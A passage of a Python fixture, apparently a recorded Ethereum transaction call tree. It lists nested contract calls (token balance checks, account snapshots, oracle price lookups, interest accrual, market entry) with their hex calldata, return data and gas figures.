000000c000000000000000000000000000000000000000000000000000000000000000421ca1a7c12b193b68e6ac3d4269b9c1fd75051a012db63ecd99d217f7b8bc95badb74a1c07e0046c5f98f8b3acf1f745d1cc0b8950ec852ba929ca1479c6e025ff10300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010400000000000000000000000000000000000000000000000000000000000000869584cd000000000000000000000000322d58b9e75a6918f7e7849aee0ff09369977e0800000000000000000000000000000000000000000000003cf9caf5925fb4ac67000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x0000000000b3f879cb30fe243b4dfee438691c04"),
"value": 0,
"depth": 0,
"gas_limit": 1286820,
"gas_cost": 1303,
"calldata": HexBytes(
"0x70a08231000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b"),
"value": 0,
"depth": 0,
"gas_limit": 1283749,
"gas_cost": 118577,
"calldata": HexBytes(
"0x5ec88c79000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001538bb6679b4a8dee8ac0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes("0x7b5e3521a049c8ff88e6349f33044c6cc33c113c"),
"value": 0,
"depth": 0,
"gas_limit": 1261921,
"gas_cost": 116582,
"calldata": HexBytes(
"0x5ec88c79000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001538bb6679b4a8dee8ac0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x4ddc2d193948926d02f9b1fe9e1daa0718270ed5"
),
"value": 0,
"depth": 0,
"gas_limit": 1235205,
"gas_cost": 7747,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003437612e40a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a5acfef01d00971b81cbd9"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 1224101,
"gas_cost": 2843,
"calldata": HexBytes(
"0xfc57d4df0000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000001ac09e6fd9f7658000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x5d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"value": 0,
"depth": 0,
"gas_limit": 1215968,
"gas_cost": 20072,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000abd7c1d14591f98d3565d2"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x5d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"value": 0,
"depth": 0,
"gas_limit": 1194674,
"gas_cost": 16646,
"calldata": HexBytes(
"0x0933c1ed00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000024c37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000abd7c1d14591f98d3565d2"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0xbb8be4772faa655c255309afc3c5207aa7b896fd"
),
"value": 0,
"depth": 0,
"gas_limit": 1173557,
"gas_cost": 13461,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000abd7c1d14591f98d3565d2"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x197e90f9fad81970ba7976f33cbd77088e5d7cf7"
),
"value": 0,
"depth": 0,
"gas_limit": 1149779,
"gas_cost": 1215,
"calldata": HexBytes(
"0x0bebac860000000000000000000000005d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000120826dfebe6c4e87c468e0"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x197e90f9fad81970ba7976f33cbd77088e5d7cf7"
),
"value": 0,
"depth": 0,
"gas_limit": 1146980,
"gas_cost": 1093,
"calldata": HexBytes("0xc92aecc4"),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000034a13ac9ed2cf6900e592bb"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 1192732,
"gas_cost": 2931,
"calldata": HexBytes(
"0xfc57d4df0000000000000000000000005d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000df84bed7768e000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x35a18000230da775cac24873d00ff85bccded550"
),
"value": 0,
"depth": 0,
"gas_limit": 1184512,
"gas_cost": 16641,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001d1225fe65e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a658d713a7d5c4a7a72ece"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x35a18000230da775cac24873d00ff85bccded550"
),
"value": 0,
"depth": 0,
"gas_limit": 1163710,
"gas_cost": 13215,
"calldata": HexBytes(
"0x0933c1ed00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000024c37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001d1225fe65e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a658d713a7d5c4a7a72ece"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x338f7e5d19d9953b76dd81446b142c2d9fe03482"
),
"value": 0,
"depth": 0,
"gas_limit": 1143076,
"gas_cost": 10030,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001d1225fe65e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a658d713a7d5c4a7a72ece"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x1f9840a85d5af5bf1d1762f925bdaddc4201f984"
),
"value": 0,
"depth": 0,
"gas_limit": 1119822,
"gas_cost": 1497,
"calldata": HexBytes(
"0x70a0823100000000000000000000000035a18000230da775cac24873d00ff85bccded550"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000acca862cc8349fcf261ae"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 1164653,
"gas_cost": 3635,
"calldata": HexBytes(
"0xfc57d4df00000000000000000000000035a18000230da775cac24873d00ff85bccded550"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000033a760c1363e2000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"value": 0,
"depth": 0,
"gas_limit": 1155738,
"gas_cost": 19027,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026cf38faf10000000000000000000000000000000000000000000000000000b93ff48f0b5300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"value": 0,
"depth": 0,
"gas_limit": 1135843,
"gas_cost": 16924,
"calldata": HexBytes(
"0x0933c1ed00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000024c37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026cf38faf10000000000000000000000000000000000000000000000000000b93ff48f0b53"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x976aa93ca5aaa569109f4267589c619a097f001d"
),
"value": 0,
"depth": 0,
"gas_limit": 1115645,
"gas_cost": 13739,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026cf38faf10000000000000000000000000000000000000000000000000000b93ff48f0b53"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xdac17f958d2ee523a2206206994597c13d831ec7"
),
"value": 0,
"depth": 0,
"gas_limit": 1090088,
"gas_cost": 2431,
"calldata": HexBytes(
"0x70a08231000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000088ee804439c"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 1133531,
"gas_cost": 2299,
"calldata": HexBytes(
"0xfc57d4df000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000c9f2c9cd04674edea40000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b"),
"value": 0,
"depth": 0,
"gas_limit": 1165313,
"gas_cost": 3073,
"calldata": HexBytes("0x7dc0d1d0"),
"returndata": HexBytes(
"0x000000000000000000000000922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes("0x7b5e3521a049c8ff88e6349f33044c6cc33c113c"),
"value": 0,
"depth": 0,
"gas_limit": 1145341,
"gas_cost": 1105,
"calldata": HexBytes("0x7dc0d1d0"),
"returndata": HexBytes(
"0x000000000000000000000000922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"),
"value": 0,
"depth": 0,
"gas_limit": 1160557,
"gas_cost": 42845,
"calldata": HexBytes("0xa6afed95"),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes("0x976aa93ca5aaa569109f4267589c619a097f001d"),
"value": 0,
"depth": 0,
"gas_limit": 1140614,
"gas_cost": 40830,
"calldata": HexBytes("0xa6afed95"),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xdac17f958d2ee523a2206206994597c13d831ec7"
),
"value": 0,
"depth": 0,
"gas_limit": 1119359,
"gas_cost": 2431,
"calldata": HexBytes(
"0x70a08231000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000088ee804439c"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xfb564da37b41b2f6b6edcc3e56fbf523bd9f2012"
),
"value": 0,
"depth": 0,
"gas_limit": 1112112,
"gas_cost": 3858,
"calldata": HexBytes(
"0x15f240530000000000000000000000000000000000000000000000000000088ee804439c00000000000000000000000000000000000000000000000000001d139311c1b90000000000000000000000000000000000000000000000000000001b12fec2d4"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000044a45c5a9"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x922018674c12a7f0d394ebeef9b58f186cde13c1"),
"value": 0,
"depth": 0,
"gas_limit": 1116647,
"gas_cost": 2299,
"calldata": HexBytes(
"0xfc57d4df000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000c9f2c9cd04674edea40000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0xdac17f958d2ee523a2206206994597c13d831ec7"),
"value": 0,
"depth": 0,
"gas_limit": 1112144,
"gas_cost": 2431,
"calldata": HexBytes(
"0x70a082310000000000000000000000003dfd23a6c5e8bbcfc9581d2e864a68feb6a076d3"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000006ab9ba43b69"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b"),
"value": 0,
"depth": 0,
"gas_limit": 1107301,
"gas_cost": 7351,
"calldata": HexBytes(
"0xc2998238000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000020000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes("0x7b5e3521a049c8ff88e6349f33044c6cc33c113c"),
"value": 0,
"depth": 0,
"gas_limit": 1088212,
"gas_cost": 5335,
"calldata": HexBytes(
"0xc2998238000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000020000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0xf14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
"value": 0,
"depth": 0,
"gas_limit": 1097815,
"gas_cost": 1247,
"calldata": HexBytes("0x8da5cb5b"),
"returndata": HexBytes(
"0x0000000000000000000000005668ead1edb8e2a4d724c8fb9cb5ffeabeb422dc"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b"),
"value": 0,
"depth": 0,
"gas_limit": 1094726,
"gas_cost": 118577,
"calldata": HexBytes(
"0x5ec88c79000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001538b63e2c5ee5b3e8ac0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes("0x7b5e3521a049c8ff88e6349f33044c6cc33c113c"),
"value": 0,
"depth": 0,
"gas_limit": 1075851,
"gas_cost": 116582,
"calldata": HexBytes(
"0x5ec88c79000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001538b63e2c5ee5b3e8ac0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x4ddc2d193948926d02f9b1fe9e1daa0718270ed5"
),
"value": 0,
"depth": 0,
"gas_limit": 1052042,
"gas_cost": 7747,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003437612e40a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a5acfef01d00971b81cbd9"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 1040939,
"gas_cost": 2843,
"calldata": HexBytes(
"0xfc57d4df0000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000001ac09e6fd9f7658000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x5d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"value": 0,
"depth": 0,
"gas_limit": 1032806,
"gas_cost": 20072,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000abd7c1d14591f98d3565d2"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x5d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"value": 0,
"depth": 0,
"gas_limit": 1014374,
"gas_cost": 16646,
"calldata": HexBytes(
"0x0933c1ed00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000024c37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000abd7c1d14591f98d3565d2"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0xbb8be4772faa655c255309afc3c5207aa7b896fd"
),
"value": 0,
"depth": 0,
"gas_limit": 996074,
"gas_cost": 13461,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000abd7c1d14591f98d3565d2"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x197e90f9fad81970ba7976f33cbd77088e5d7cf7"
),
"value": 0,
"depth": 0,
"gas_limit": 975069,
"gas_cost": 1215,
"calldata": HexBytes(
"0x0bebac860000000000000000000000005d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000120826dfebe6c4e87c468e0"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x197e90f9fad81970ba7976f33cbd77088e5d7cf7"
),
"value": 0,
"depth": 0,
"gas_limit": 972271,
"gas_cost": 1093,
"calldata": HexBytes("0xc92aecc4"),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000034a13ac9ed2cf6900e592bb"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 1009570,
"gas_cost": 2931,
"calldata": HexBytes(
"0xfc57d4df0000000000000000000000005d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000df84bed7768e000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x35a18000230da775cac24873d00ff85bccded550"
),
"value": 0,
"depth": 0,
"gas_limit": 1001349,
"gas_cost": 16641,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001d1225fe65e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a658d713a7d5c4a7a72ece"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x35a18000230da775cac24873d00ff85bccded550"
),
"value": 0,
"depth": 0,
"gas_limit": 983409,
"gas_cost": 13215,
"calldata": HexBytes(
"0x0933c1ed00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000024c37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001d1225fe65e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a658d713a7d5c4a7a72ece"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x338f7e5d19d9953b76dd81446b142c2d9fe03482"
),
"value": 0,
"depth": 0,
"gas_limit": 965593,
"gas_cost": 10030,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001d1225fe65e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a658d713a7d5c4a7a72ece"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x1f9840a85d5af5bf1d1762f925bdaddc4201f984"
),
"value": 0,
"depth": 0,
"gas_limit": 945112,
"gas_cost": 1497,
"calldata": HexBytes(
"0x70a0823100000000000000000000000035a18000230da775cac24873d00ff85bccded550"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000acca862cc8349fcf261ae"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 981490,
"gas_cost": 3635,
"calldata": HexBytes(
"0xfc57d4df00000000000000000000000035a18000230da775cac24873d00ff85bccded550"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000033a760c1363e2000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"value": 0,
"depth": 0,
"gas_limit": 972576,
"gas_cost": 19027,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026cf3ea6a10000000000000000000000000000000000000000000000000000b9400555ff6100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"value": 0,
"depth": 0,
"gas_limit": 955543,
"gas_cost": 16924,
"calldata": HexBytes(
"0x0933c1ed00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000024c37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026cf3ea6a10000000000000000000000000000000000000000000000000000b9400555ff61"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x976aa93ca5aaa569109f4267589c619a097f001d"
),
"value": 0,
"depth": 0,
"gas_limit": 938162,
